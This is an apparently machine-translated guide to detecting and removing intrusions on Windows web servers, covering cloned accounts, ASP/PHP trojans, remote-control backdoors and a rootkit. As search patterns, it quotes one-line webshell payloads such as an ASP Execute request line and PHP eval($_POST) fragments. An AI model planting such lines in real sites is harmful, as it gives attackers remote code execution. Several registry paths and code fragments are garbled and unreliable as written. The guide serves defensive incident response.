Comprehensive server intrusion detection Solution

I. Analysis of hacker intrusion and backdoor release process

1. Access through website vulnerabilities, escalate permissions, and then clone the Administrator account

2. upload an ASP or PHP Trojan and hide a deep directory

3. Leave a backdoor
Such as pigeon remote control software and radmin remote control software.
System-level backdoor hacker: hxdef100 (hacker guard) Rootkit

4. asp or php webshell.

Ii. Account Security Check

1. check whether there are any suspicious user logins:

Method 1: Check whether a user has been created in Computer Management.

Method 2: Go to the C: Documents and Settings directory to see if there are any folders for suspicious accounts.

Method 3: Go to the security log in the event viewer to check whether there are any suspicious users successfully logged on.

2. Check whether the administrator user has been cloned.
Note the disabled guest user.

Method: Check in the Registry
HKEY_LOCAL_MAICHINESAMSAMDomainsaccountusers

HKEY_LOCAL_MAICHINESAMSAMDomainsaccountuserames

3. Check ASP Trojan and PHP Trojan

TIPS:
1. Right-click the folder of the entire website or forum to search

2. Enter. php or asp in all or part of the file names and select your entire website folder or the entire Forum folder in the search range.
Tip: in all or part of the file names, you can also choose not to lose. In this way, you can find any files. From these files, we can see if they are Trojans, backdoors, and other suspicious programs .. (these programs are not necessarily php, asp, or other backdoor programs with extensions such as exe)

3. Click --- when will it be modified? ---- Specify date --- enter the date on which your website or forum was infiltrated. (modify the file date) ---- then click search.

Tip: because of our website programs and Forum programs. asp or. there are a lot of PHP files, and it is impossible to find out if it is a trojan one by one. So it is very clever to use the modified or created date to greatly narrow the scope, so it is easier to find out the Trojan.
_____________________________________________________________
Generally, when intruders upload Trojans -------- select the creation date

When a trojan is inserted in a normal program ------ select the modification date
_____________________________________________________________

4. There are two methods to determine whether asp or php is a trojan.
1>. Open each program directly and check the code in it. Some of them are encrypted, so it is easy to tell.
2>. another way is to directly enter the entire website in the browser to see what will be displayed in this file. If it is a Trojan, a logon Password box will be displayed, so I knew it was a Trojan.

4. Check asp and php webshells.

Generally, after attackers obtain the webshell of a website, they usually insert a trojan in the webpage to facilitate future access. The trojan in one sentence is concealed, among so many files, we do not know which file to insert. It is impossible to find and search files one by one. therefore, we must master certain skills.

One-sentence backdoor of asp:
"<% Execute request (" l ") %> 〉"

PHP webshell:
First:
EOT;
Eval ($ );
Print <EOT

Second minute:
2.
A'] = 'aa'; eval ($ _ POST ['A ']); //

Third:
3.
A'; eval ($ _ POST ['A ']); //

The checking method is the same as the method used to detect asp or php Trojans. First, search for the modified or created files on the specified date, and then search for the following keywords in one file:
Asp one-sentence Trojan: Search Keyword: <% execute
PHP one-sentence Trojan: Search Keyword: eval

Generally, the above method quickly finds out the page on which a backdoor is searched.

5. detect trojans and backdoors on the server.

Trojan: pigeon radmin

Post-category: hxdef100 (hacker guard) Rootkit kernel-level backdoor, concealed

After obtaining system privileges, hackers generally combine the following components to further control the system:

Powerful remote control software + backdoor + asp PHP Trojan + one-sentence Backdoor
-----------------------------------------------------

Check Method:

Ice blade-common remote control software can be found
The inserted process is displayed in red.
Integrated detection using an ice blade with suspicious services, ports, processes, and registry entries.

Rkdetector --- detects hxdef100 and Rootkit.

Clear method:

For pigeon-the pigeon exclusive killing + pigeon exclusive killing from Kingsoft (version used)

For hxdef100

Net stop HackerDefender100
Search for hxdef100.exe and hxdef100.ini. Find and delete them.

The above is the process of searching and clearing Remote Control Trojans, backdoor programs, asp, php Trojans, and asp, php webshells.

Find out the cause of website intrusion. This is the security configuration of the server after reading the relevant logs, analyzing the logs, and removing Trojans. It will be discussed later.

NOTE: For the phpwind Forum, check the following:
1. Check whether files of the upload type have been managed or modified. For example, you can directly upload php files
2. check whether a php Trojan is inserted in the background style or elsewhere.
3. Check for suspicious new administrators and perform security detection ..